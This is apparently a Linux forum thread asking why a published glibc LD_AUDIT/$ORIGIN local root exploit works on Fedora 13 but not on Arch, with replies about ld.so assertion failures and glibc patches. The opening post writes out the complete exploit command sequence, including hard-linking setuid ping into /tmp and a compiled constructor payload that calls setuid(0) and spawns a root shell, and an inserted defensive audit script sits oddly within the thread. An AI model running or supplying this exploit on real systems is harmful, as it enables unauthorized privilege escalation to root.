Can anyone explain why this exploit does not work in Arch? http://www.exploit-db.com/exploits/15274/
It does indeed give you root privilege in Fedora 13, but when I try it in Arch both the gnome-terminal and xterm windows simply disappear after entering the last command.
cd /tmp
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
echo 'void __attribute__((constructor)) init(){setuid(0);system("/bin/bash");}' > payload.c
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
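The `ln /bin/ping /tmp/exploit/target` step above only succeeds when a setuid binary sits on the same filesystem as a user-writable directory and the kernel permits the hard link. The following audit script is an added example, not part of the original thread; the function names are hypothetical and it assumes GNU `stat` and `find` on Linux.

```shell
#!/bin/sh
# Added example: audit the hard-link precondition of the steps quoted above.
# Assumes GNU coreutils/findutils. Function names are illustrative only.

# same_fs A B: succeeds when A and B are on the same filesystem (device),
# which is required for a hard link between them to be possible at all.
same_fs() {
    [ "$(stat -c %d -- "$1")" = "$(stat -c %d -- "$2")" ]
}

# linkable_setuid DIR WRITABLE: print setuid files under DIR that share a
# filesystem with WRITABLE (for example /tmp) and so could be linked there.
linkable_setuid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        if same_fs "$f" "$2"; then printf '%s\n' "$f"; fi
    done
}

# extra_links DIR: print "<link count> <path>" for setuid files under DIR
# that already have more than one name, i.e. a hard link exists somewhere.
extra_links() {
    find "$1" -xdev -type f -perm -4000 -links +1 \
        -exec stat -c '%h %n' -- {} + 2>/dev/null
}

# protected_hardlinks: Linux 3.6+ sysctl; 1 means the kernel refuses hard
# links to files the caller does not own. Prints "unknown" if absent.
protected_hardlinks() {
    cat /proc/sys/fs/protected_hardlinks 2>/dev/null || echo unknown
}

# Usage: sh audit.sh WRITABLE_DIR SETUID_DIR...   e.g. sh audit.sh /tmp /bin /usr/bin
if [ "$#" -ge 2 ]; then
    w=$1; shift
    echo "fs.protected_hardlinks = $(protected_hardlinks)"
    for d in "$@"; do
        echo "== setuid files in $d that can be hard-linked from $w"
        linkable_setuid "$d" "$w"
        echo "== setuid files in $d that already have extra hard links"
        extra_links "$d"
    done
fi
```

An empty first list means the setuid directories are on a separate filesystem from the writable one, so the `ln` step cannot work there; any entry in the second list deserves a look at where the other name lives.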
If you first exec a new shell or just use one of the vtys, you get: "Inconsistency detected by ld.so: dl-open.c: 232: dl_open_worker: Assertion `(call_map)->l_name[0] == '\0'' failed!"
Other versions are probably affected, possibly via different vectors. I'm aware
several versions of ld.so in common use hit an assertion in dl_open_worker, I
do not know if it's possible to avoid this.
Is it clear now?
Thanks for the reply, I hadn't thought to try it in a vty. I was a bit astonished when my terminal windows vanished, and nothing in the logs.
I think it is because we have a glibc that is not affected by this. It is a snapshot since 20101007.
Give what you have. To someone, it may be better than you dare to think.
I think it is because we have a glibc that is not affected by this. It is a snapshot since 20101007.
Really? What an awesome glibc maintainer we must have!
So Allan didn't break it after all?
While certain distros-that-will-be-nameless scramble to fix it (http://koji.fedoraproject.org/koji/buil … dID=201079), Arch sails securely on...
Well... we do not actually have the fix Fedora are busy pushing.
So I am really not sure why it does not work. Maybe one of the other patches I used breaks it?
...So Allan somehow broke it after all?
This silver ladybug at line 28...